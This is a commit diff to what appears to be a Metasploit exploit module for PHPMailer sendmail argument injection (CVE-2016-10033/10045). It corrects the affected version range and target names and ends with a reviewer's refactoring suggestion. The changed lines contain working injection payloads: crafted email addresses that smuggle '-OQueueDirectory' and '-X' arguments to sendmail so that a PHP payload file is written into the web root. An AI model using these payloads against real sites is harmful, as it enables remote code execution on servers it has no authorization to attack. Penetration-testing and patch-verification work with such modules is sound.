Fix PHPMailer targets since 5.2.20 is not affected

bug/bundler_fix
Spencer McIntyre 2016-12-30 15:31:15 -05:00
parent 1eab4b3a7d
commit cd90fd3b1c
1 changed files with 8 additions and 6 deletions


@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'PHPMailer Sendmail Argument Injection',
'Description' => %q{
PHPMailer versions up to and including 5.2.20 are affected by a
PHPMailer versions up to and including 5.2.19 are affected by a
vulnerability which can be leveraged by an attacker to write a file with
partially controlled contents to an arbitrary location through injection
of arguments that are passed to the sendmail binary. This module
@ -31,6 +31,8 @@ class MetasploitModule < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'References' => [
['CVE', '2016-10033'],
['CVE', '2016-10045'],
['EDB', '40968'],
['EDB', '40969'],
['URL', 'https://github.com/opsxcq/exploit-CVE-2016-10033'],
['URL', 'https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html']
@ -40,8 +42,8 @@ class MetasploitModule < Msf::Exploit::Remote
'Arch' => ARCH_PHP,
'Payload' => {'DisableNops' => true},
'Targets' => [
['PHPMailer <=5.2.18', {}],
['PHPMailer 5.2.20', {}]
['PHPMailer <5.2.18', {}],
['PHPMailer 5.2.18 - 5.2.19', {}]
],
'DefaultTarget' => 0
))
@ -95,10 +97,10 @@ class MetasploitModule < Msf::Exploit::Remote
payload_file_name = "#{rand_text_alphanumeric(8)}.php"
payload_file_path = "#{datastore['WEB_ROOT']}/#{payload_file_name}"
if target.name == 'PHPMailer <=5.2.18'
if target.name == 'PHPMailer <5.2.18'
email = "\"#{rand_text_alphanumeric(4 + rand(8))}\\\" -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\"@#{rand_text_alphanumeric(4 + rand(8))}.com"
elsif target.name == 'PHPMailer 5.2.20'
email = "\\\"#{rand_text_alphanumeric(4 + rand(8))}\\' -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\\\"@#{rand_text_alphanumeric(4 + rand(8))}.com"
elsif target.name == 'PHPMailer 5.2.18 - 5.2.19'
email = "\"#{rand_text_alphanumeric(4 + rand(8))}\\' -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\"@#{rand_text_alphanumeric(4 + rand(8))}.com"
else
fail_with(Failure::NoTarget, 'The specified version is not supported')
end
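Review bot: The two target names are now spelled out twice, once in the 'Targets' table and once in the `target.name ==` comparisons in the last hunk, so a rename like this one has to be made in both places and any mismatch falls through to the `fail_with(Failure::NoTarget, ...)` branch. Carrying a key in each target's options hash and branching on that would remove the coupling, e.g. `['PHPMailer <5.2.18', { 'Variant' => :pre_5_2_18 }]` with `if target['Variant'] == :pre_5_2_18`; the key name is a suggestion, not something the module already defines. The enclosing method starts before the hunk and may continue past it, so this is based only on the visible branch. It would also help readers checking their own exposure if the Description stated that 5.2.20 is the first unaffected release, which the commit title says but the module text only implies.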